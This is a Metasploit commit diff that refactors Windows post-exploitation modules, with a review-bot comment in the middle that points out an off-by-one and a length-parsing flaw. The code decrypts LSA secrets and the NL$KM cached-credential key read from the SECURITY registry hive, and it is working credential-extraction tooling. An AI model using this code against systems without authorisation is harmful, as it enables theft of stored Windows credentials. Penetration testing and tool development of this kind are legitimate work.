move decrypt_lsa and decrypt_secret to priv too

bug/bundler_fix
Rob Fuller 2013-10-17 00:04:21 -04:00
parent 541d932d77
commit 8f2ba68934
3 changed files with 42 additions and 71 deletions


@ -175,7 +175,7 @@ module Msf::Post::Windows::Priv
end end
if( @vista == 1 ) if( @vista == 1 )
lsakey = decrypt_lsa(pol, bootkey) lsakey = decrypt_lsa_data(pol, bootkey)
lsakey = lsakey[68,32] lsakey = lsakey[68,32]
vprint_good(lsakey.unpack("H*")[0]) vprint_good(lsakey.unpack("H*")[0])
else else
@ -195,9 +195,9 @@ module Msf::Post::Windows::Priv
end end
# #
# Decrypts the LSA key # Decrypts the LSA encrypted data
# #
def decrypt_lsa(pol, encryptedkey) def decrypt_lsa_data(pol, encryptedkey)
sha256x = Digest::SHA256.new() sha256x = Digest::SHA256.new()
sha256x << encryptedkey sha256x << encryptedkey
@ -210,17 +210,48 @@ module Msf::Post::Windows::Priv
vprint_status("digest #{sha256x.digest.unpack("H*")[0]}") vprint_status("digest #{sha256x.digest.unpack("H*")[0]}")
decryptedkey = '' decrypted_data = ''
for i in (60...pol.length).step(16) for i in (60...pol.length).step(16)
aes.decrypt aes.decrypt
aes.padding = 0 aes.padding = 0
xx = aes.update(pol[i...i+16]) xx = aes.update(pol[i...i+16])
decryptedkey += xx decrypted_data += xx
end end
vprint_good("Dec_Key #{decryptedkey}") vprint_good("Dec_Key #{decrypted_data}")
return decrypted_data
end
# Decrypts "Secret" encrypted data
# Ruby implementation of SystemFunction005
# the original python code has been taken from Credump
#
def decrypt_secret_data(secret, key)
j = 0
decrypted_data = ''
for i in (0...secret.length).step(8)
enc_block = secret[i..i+7]
block_key = key[j..j+6]
des_key = convert_des_56_to_64(block_key)
d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
d1.padding = 0
d1.key = des_key
d1o = d1.update(enc_block)
d1o << d1.final
decrypted_data += d1o
j += 7
if (key[j..j+7].length < 7 )
j = key[j..j+7].length
end
end
dec_data_len = decrypted_data[0].ord
return decrypted_data[8..8+dec_data_len]
return decryptedkey
end end
end end
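Review bot: `decrypt_secret_data` returns one byte more than the length it just read, because `decrypted_data[8..8+dec_data_len]` is an inclusive range and yields `dec_data_len + 1` bytes; `return decrypted_data[8, dec_data_len]` gives exactly the stated length. The length itself comes from the first byte only (`decrypted_data[0].ord`), so if the header is the 32-bit little-endian field that the Credump original appears to read, any secret over 255 bytes is cut short; `dec_data_len = decrypted_data[0, 4].unpack('V')[0]` would cover that. An empty `secret` leaves `decrypted_data` as `''`, and `decrypted_data[0].ord` then raises NoMethodError on nil, so now that this is a shared mixin method a guard such as `return '' if decrypted_data.empty?` before the length read is worth adding. One caller visible on this page filters the result through `scan(/[[:print:]]/)`, which would hide the stray byte, but the NL$KM path returns the result unfiltered.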


@ -53,36 +53,6 @@ class Metasploit3 < Msf::Post
end end
end end
def decrypt_secret(secret, key)
# Ruby implementation of SystemFunction005
# the original python code has been taken from Credump
j = 0
decrypted_data = ''
for i in (0...secret.length).step(8)
enc_block = secret[i..i+7]
block_key = key[j..j+6]
des_key = convert_des_56_to_64(block_key)
d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
d1.padding = 0
d1.key = des_key
d1o = d1.update(enc_block)
d1o << d1.final
decrypted_data += d1o
j += 7
if (key[j..j+7].length < 7 )
j = key[j..j+7].length
end
end
dec_data_len = decrypted_data[0].ord
return decrypted_data[8..8+dec_data_len]
end
def capture_nlkm(lsakey) def capture_nlkm(lsakey)
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\Secrets\\NL$KM\\CurrVal", KEY_READ) ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\Secrets\\NL$KM\\CurrVal", KEY_READ)
nlkm = ok.query_value("").data nlkm = ok.query_value("").data
@ -91,9 +61,9 @@ class Metasploit3 < Msf::Post
print_status("Encrypted NL$KM: #{nlkm.unpack("H*")[0]}") if( datastore['DEBUG'] ) print_status("Encrypted NL$KM: #{nlkm.unpack("H*")[0]}") if( datastore['DEBUG'] )
if( @vista == 1 ) if( @vista == 1 )
nlkm_dec = decrypt_lsa( nlkm[0..-1], lsakey) nlkm_dec = decrypt_lsa_data( nlkm[0..-1], lsakey)
else else
nlkm_dec = decrypt_secret( nlkm[0xC..-1], lsakey) nlkm_dec = decrypt_secret_data( nlkm[0xC..-1], lsakey)
end end
return nlkm_dec return nlkm_dec


@ -30,36 +30,6 @@ class Metasploit3 < Msf::Post
)) ))
end end
def decrypt_secret(secret, key)
# Ruby implementation of SystemFunction005
# the original python code has been taken from Credump
j = 0
decrypted_data = ''
for i in (0...secret.length).step(8)
enc_block = secret[i..i+7]
block_key = key[j..j+6]
des_key = convert_des_56_to_64(block_key)
d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
d1.padding = 0
d1.key = des_key
d1o = d1.update(enc_block)
d1o << d1.final
decrypted_data += d1o
j += 7
if (key[j..j+7].length < 7 )
j = key[j..j+7].length
end
end
dec_data_len = decrypted_data[0].ord
return decrypted_data[8..8+dec_data_len]
end
def reg_getvaldata(key,valname) def reg_getvaldata(key,valname)
v = nil v = nil
begin begin
@ -97,11 +67,11 @@ class Metasploit3 < Msf::Post
if( @vista == 1 ) if( @vista == 1 )
#Magic happens here #Magic happens here
sec = sec[0..-1] sec = sec[0..-1]
sec = decrypt_lsa(sec, lkey)[1..-1].scan(/[[:print:]]/).join sec = decrypt_lsa_data(sec, lkey)[1..-1].scan(/[[:print:]]/).join
else else
#and here #and here
sec = sec[0xC..-1] sec = sec[0xC..-1]
sec = decrypt_secret(sec, lkey).scan(/[[:print:]]/).join sec = decrypt_secret_data(sec, lkey).scan(/[[:print:]]/).join
end end
if(sec.length > 0) if(sec.length > 0)